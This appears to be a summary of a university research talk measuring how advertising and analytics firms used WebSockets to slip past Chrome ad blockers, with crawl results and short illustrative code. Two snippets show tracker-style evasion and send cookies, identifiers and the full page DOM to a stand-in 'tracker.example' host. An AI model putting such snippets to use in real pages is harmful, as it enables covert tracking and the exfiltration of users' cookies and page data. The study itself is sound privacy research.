How Tracking Companies Circumvented Ad Blockers Using WebSockets
Sajjad "JJ" Arshad

This presentation describes how advertising and analytics (A&A) companies circumvented ad blockers by leveraging a bug in Chrome's webRequest extension API: WebSocket requests did not trigger the API, so they bypassed extension inspection entirely. The authors crawled 100,000 websites before and after the bug was patched to analyze how A&A companies used WebSockets. They found that around 2% of sites used WebSockets, that 55-73% of WebSocket connections were initiated by or contacted A&A domains, and that the number of unique advertising domains initiating WebSockets dropped after the bug was patched in Chrome 58.
1. How Tracking Companies Circumvented Ad Blockers Using WebSockets
Muhammad Ahmad Bashir, Sajjad Arshad, Engin Kirda, William Robertson, Christo Wilson
Northeastern University
5. Online Tracking
Surge in online advertising (internet economy)
• Ad networks pour in billions of dollars.
• Value for their investment?
• Extensive tracking to serve targeted ads.
User concern over tracking
• Led to the proliferation of ad-blocking extensions
Ad networks fight back
• E.g., using anti-ad-blocking scripts
6. Google & Safari
• Google evaded Safari's third-party cookie blocking policy (Jonathan Mayer)
• … by submitting a form in an invisible iframe
• Google was fined $22.5M by the FTC
8. This Talk
How ad networks leveraged a bug in a Chrome API to bypass ad blockers using WebSockets
1. What caused this?
2. How was this bug leveraged by ad networks?
29. Ad Blockers
• Chrome extensions use the chrome.webRequest API
• An extension can inspect / modify / drop outgoing requests
[Diagram: outgoing requests such as http://cnn.com/logo.jpeg and http://doubleclick.com/s1.js pass through the webRequest API, where their URLs are checked against a rule list, usually borrowed from EasyList; the benign image is allowed through while the ad script is dropped.]
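To make the blocking path concrete, here is a minimal sketch of an ad-blocking listener built on this API — written in TypeScript assuming the @types/chrome typings and the Manifest V2 blocking webRequest model, not the code of any particular ad blocker. The one-pattern "rule list" stands in for a real EasyList rule set:

```typescript
// Minimal ad-blocker sketch on the (Manifest V2) blocking webRequest API.
// The single pattern below is an illustrative stand-in for EasyList rules.
const blockedPatterns: RegExp[] = [/doubleclick\.com/];

chrome.webRequest.onBeforeRequest.addListener(
  (details: chrome.webRequest.WebRequestBodyDetails) => {
    // Cancel the request if its URL matches any rule; let it through otherwise.
    const blocked = blockedPatterns.some((p) => p.test(details.url));
    return { cancel: blocked };
  },
  { urls: ["<all_urls>"] }, // inspect every outgoing request ...
  ["blocking"]              // ... synchronously, so the return value can cancel it
);
```

In the buggy Chrome versions, a ws:// or wss:// handshake never reached this listener at all, so no rule list could match it — which is exactly the gap described on the next slide.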
37. AdBlock Evasion
• Bug in the webRequest API
• ws/wss requests did not trigger the API
[Timeline, 2012-2018, in order: original bug reported; users report unblocked ads; patch finalized (landed); Chrome 58 released. Asterisks mark when our four crawls were done.]
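As a purely illustrative sketch of the evasion this enabled: both requests below fetch tracking resources from a made-up tracker.example host, but in Chrome before version 58 only the first passed through webRequest listeners.

```typescript
// Illustrative only: in Chrome < 58, an ad blocker saw the fetch but never
// the WebSocket handshake, because ws/wss did not trigger chrome.webRequest.
fetch("http://tracker.example/ad.js");                 // inspectable, blockable
const ws = new WebSocket("wss://tracker.example/ad");  // invisible pre-patch
ws.onopen = () => ws.send("page=" + location.href);    // tracking proceeds unblocked
```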
47. Data Crawling
• 100K websites sampled from Alexa
• Visited 15 links per website
• Collected inclusion chains for all included resources; this means we know which resource included which other resource
• Filtered WebSockets: kept all resources which end in WebSockets
• Detected A&A WebSockets: marked WebSockets which are used by A&A domains
A&A = Advertising and Analytics, e.g., DoubleClick, Criteo, Adnxs
[Example inclusion tree: pub/index.html includes srv.ws (a WebSocket), ads/script.js, and ads/frame.html; ads/frame.html in turn includes ads/img_a.jpg and adnet/data.ws (an A&A WebSocket).]
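A minimal sketch of the WebSocket-filtering step over an inclusion tree, assuming a simplified tree shape and a three-domain A&A list for illustration (the actual study matches domains against curated A&A filter lists):

```typescript
// Walk an inclusion tree, keep resources that are WebSocket endpoints,
// and mark the ones belonging to A&A domains, preserving each socket's
// inclusion chain (which resource included which other resource).
interface Resource {
  url: string;          // e.g. "wss://adnet.example/data.ws"
  children: Resource[]; // resources this one included
}

const AA_DOMAINS = ["doubleclick.net", "criteo.com", "adnxs.com"];

function isWebSocket(r: Resource): boolean {
  return r.url.startsWith("ws://") || r.url.startsWith("wss://");
}

function isAA(r: Resource): boolean {
  const host = new URL(r.url).hostname;
  return AA_DOMAINS.some((d) => host === d || host.endsWith("." + d));
}

function findWebSockets(
  node: Resource,
  chain: string[] = []
): { chain: string[]; url: string; aa: boolean }[] {
  const here = [...chain, node.url];
  const hits: { chain: string[]; url: string; aa: boolean }[] =
    isWebSocket(node) ? [{ chain: here, url: node.url, aa: isAA(node) }] : [];
  // Recurse into children and flatten the per-subtree results.
  return hits.concat(node.children.flatMap((c) => findWebSockets(c, here)));
}
// Usage: findWebSockets(rootOfInclusionTree) yields every WebSocket
// endpoint found in a crawl, tagged with its chain and A&A status.
```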
71. Sent Items Over WebSockets
[Bar chart: % of requests containing Cookies, IP addresses, User IDs, Fingerprinting Variables, and the DOM, compared between WebSockets and HTTP/S (x-axis: 0-80% of requests).]
• Stateful identifiers like cookies and user IDs
• Fingerprinting data in ~3.4% of WebSockets; 97% of it comes from 33across
• ~1.6% of WebSockets send the entire DOM to Hotjar, LuckyOrange, or TruConversion
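As a concrete picture of these payloads, a tracking script could serialize exactly the measured items and push them over a socket. The sketch below is hypothetical: the endpoint and field names are invented, and it mirrors the categories from the chart rather than any specific company's code.

```typescript
// Hypothetical tracker payload mirroring the categories measured above.
const ws = new WebSocket("wss://tracker.example/collect");
ws.onopen = () => {
  ws.send(JSON.stringify({
    cookie: document.cookie,                    // stateful identifier
    userId: localStorage.getItem("uid"),        // stateful identifier
    screen: `${screen.width}x${screen.height}`, // fingerprinting variable
    dom: document.documentElement.outerHTML,    // entire DOM, Hotjar-style
  }));
};
```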
76. Received Items Over WebSockets
[Bar chart: % of responses containing HTML, JSON, JavaScript, and Images, compared between WebSockets and HTTP/S (x-axis: 0-50% of responses).]
• Ads served from Lockerdome
78. Summary
• ~67% of WebSocket connections are initiated or received by A&A domains.
• Major companies like Google, Facebook, and AddThis adopted WebSockets, then abandoned them after Chrome 58 was released.
• The culprits:
  • 33across was harvesting fingerprinting data.
  • Hotjar, LuckyOrange, and TruConversion were exfiltrating the DOM.
  • Lockerdome downloaded URLs to serve ads.
• We need to keep up with the current practices of A&A companies.

Questions?
ahmad@ccs.neu.edu